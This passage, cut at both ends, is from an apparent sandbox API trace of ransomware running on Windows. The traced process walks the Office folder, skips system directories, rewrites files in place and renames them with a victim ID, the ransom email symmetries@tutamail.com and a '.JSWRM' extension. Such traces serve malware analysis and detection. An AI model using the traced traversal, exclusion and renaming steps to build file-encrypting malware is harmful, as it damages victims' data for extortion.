dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0115.293] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x866, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="NETWORK2.VRD", cAlternateFileName="")) returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2=".") returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="..") returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="...") returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="windows") returned -1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="recovery") returned -1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="perflogs") returned -1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="documents and settings") returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="$RECYCLE.BIN") returned 1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="system volume information") returned -1 [0115.293] lstrcmpiW (lpString1="NETWORK2.VRD", lpString2="msocache") returned 1 [0115.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK2.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK2.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK2.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0115.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f20 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK2.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK2.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK2.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f20 | out: hHeap=0x1e0000) returned 1 [0115.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.293] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.293] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.293] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0115.293] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network2.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.294] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2150) returned 1 [0115.294] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.294] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x860) returned 0x20c6c0 [0115.294] ReadFile (in: hFile=0x238, lpBuffer=0x20c6c0, nNumberOfBytesToRead=0x860, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesRead=0x345e89c*=0x860, lpOverlapped=0x0) returned 1 [0115.295] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.296] WriteFile (in: hFile=0x238, lpBuffer=0x20c6c0*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20c6c0*, lpNumberOfBytesWritten=0x345e898*=0x860, lpOverlapped=0x0) returned 1 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20c6c0 | out: hHeap=0x1e0000) returned 1 [0115.296] CloseHandle (hObject=0x238) returned 1 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0115.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0115.296] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0115.296] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.296] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0115.296] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network2.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK2.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network2.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0115.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0115.297] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0xcae, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="NETWORK3.VRD", cAlternateFileName="")) returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2=".") returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="..") returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="...") returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="windows") returned -1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="recovery") returned -1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="perflogs") returned -1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="documents and settings") returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="$RECYCLE.BIN") returned 1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="system volume information") returned -1 [0115.297] lstrcmpiW (lpString1="NETWORK3.VRD", lpString2="msocache") returned 1 [0115.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0115.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK3.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.297] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK3.VRD", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK3.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.297] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0115.297] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0115.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK3.VRD", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="NETWORK3.VRD", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="NETWORK3.VRD", lpUsedDefaultChar=0x0) returned 12 [0115.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0115.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0115.298] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.298] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0115.298] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network3.vrd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.298] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=3246) returned 1 [0115.298] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.298] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xca0) returned 0x206858 [0115.298] ReadFile (in: hFile=0x238, lpBuffer=0x206858, nNumberOfBytesToRead=0xca0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesRead=0x345e89c*=0xca0, lpOverlapped=0x0) returned 1 [0115.300] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.300] WriteFile (in: hFile=0x238, lpBuffer=0x206858*, nNumberOfBytesToWrite=0xca0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x206858*, lpNumberOfBytesWritten=0x345e898*=0xca0, lpOverlapped=0x0) returned 1 [0115.300] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x206858 | out: hHeap=0x1e0000) returned 1 [0115.300] CloseHandle (hObject=0x238) returned 1 [0115.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0115.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.300] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0115.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0115.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0115.301] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0115.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0115.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd6) returned 0x1fc808 [0115.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0115.301] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x140) returned 0x21c578 [0115.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0115.301] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0115.301] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK3.VRD" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network3.vrd"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\NETWORK3.VRD.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\network3.vrd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0115.302] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xcdd36584, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xcdd36584, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xcdd36584, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xe8a8, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="ocapires.dll", cAlternateFileName="")) returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2=".") returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="..") returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="...") returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="windows") returned -1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="recovery") returned -1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="perflogs") returned -1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="documents and settings") returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="$RECYCLE.BIN") returned 1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="system volume information") returned -1 [0115.302] lstrcmpiW (lpString1="ocapires.dll", lpString2="msocache") returned 1 [0115.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0115.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocapires.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocapires.dll", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocapires.dll", lpUsedDefaultChar=0x0) returned 12 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0115.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0115.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocapires.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.302] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ocapires.dll", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ocapires.dll", lpUsedDefaultChar=0x0) returned 12 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0115.302] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0115.302] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0115.302] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x46b2075, ftCreationTime.dwHighDateTime=0x1d47c32, ftLastAccessTime.dwLowDateTime=0x46b2075, ftLastAccessTime.dwHighDateTime=0x1d47c32, ftLastWriteTime.dwLowDateTime=0x46b2075, ftLastWriteTime.dwHighDateTime=0x1d47c32, nFileSizeHigh=0x0, nFileSizeLow=0x468, dwReserved0=0x60002, dwReserved1=0x209598, cFileName="OCCMPVRD.XML", cAlternateFileName="")) returned 1 [0115.302] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2=".") returned 1 [0115.302] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="..") returned 1 [0115.302] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="...") returned 1 [0115.302] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="windows") returned -1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="recovery") returned -1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="perflogs") returned -1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="documents and settings") returned 1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="$RECYCLE.BIN") returned 1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="system volume information") returned -1 [0115.303] lstrcmpiW (lpString1="OCCMPVRD.XML", lpString2="msocache") returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCCMPVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0115.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OCCMPVRD.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OCCMPVRD.XML", lpUsedDefaultChar=0x0) returned 12 [0115.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0115.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0115.303] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0115.303] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0115.303] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0115.303] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\OCCMPVRD.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\occmpvrd.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0115.304] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1128) returned 1 [0115.304] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.304] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x460) returned 0x230a00 [0115.304] ReadFile (in: hFile=0x238, lpBuffer=0x230a00, nNumberOfBytesToRead=0x460, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesRead=0x345e89c*=0x460, lpOverlapped=0x0) returned 1 [0115.306] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0115.306] WriteFile (in: hFile=0x238, lpBuffer=0x230a00*, nNumberOfBytesToWrite=0x460, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x230a00*, lpNumberOfBytesWritten=0x345e898*=0x460, lpOverlapped=0x0) returned 1 [0115.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x230a00 | out: hHeap=0x1e0000) returned 1 [0115.306] CloseHandle (hObject=0x238) returned 1 [0115.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0115.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0115.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0115.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0115.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0115.306] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0115.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0115.306] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a378 [0115.306] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a378, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0115.306] HeapFree (in: 